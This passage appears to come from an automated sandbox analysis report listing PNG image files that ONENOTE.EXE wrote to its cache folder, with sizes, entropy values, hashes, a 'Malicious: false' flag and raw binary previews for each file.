Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000030.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000031.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	17289
Entropy (8bit):	7.962998633267186
Encrypted:	false
SSDEEP:	384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
MD5:	708E8EB906BC105CCA0535AE669AA651
SHA1:	38D82DEDFE97D3001188C2E18FE13BD741FD520F
SHA-256:	1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
SHA-512:	1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }...B@....i<8.....B@.T2 .........xp..! .....d@...!......(B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'\|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000032.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000033.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000034.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000035.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000036.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	16003
Entropy (8bit):	7.959532793770661
Encrypted:	false
SSDEEP:	384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000037.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000038.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000039.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003A.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13241
Entropy (8bit):	7.931391290415517
Encrypted:	false
SSDEEP:	384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
MD5:	01367FEEE0A83E8765E971E0D3740900
SHA1:	CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
SHA-256:	18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
SHA-512:	8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......EX........wo9..9.\|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~..U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J.w.mdv.&..@....R..o/.^..5...x.g.>..ag....GM\|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B\|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003B.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.943341403425058
Encrypted:	false
SSDEEP:	96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
MD5:	817D5A35EDB2B0E052194D4F49FDA19C
SHA1:	FA6CB2016C5F43B76102B63D60359139227E07EA
SHA-256:	0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
SHA-512:	E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
Malicious:	false
Preview:	.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b...%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....\|=.#.=.32..o.<.TnQ....g.zN...n...!/.........!....F..]...6...m...CX..~...+..U...E.\|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}.....N...N.\|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv\|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003C.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
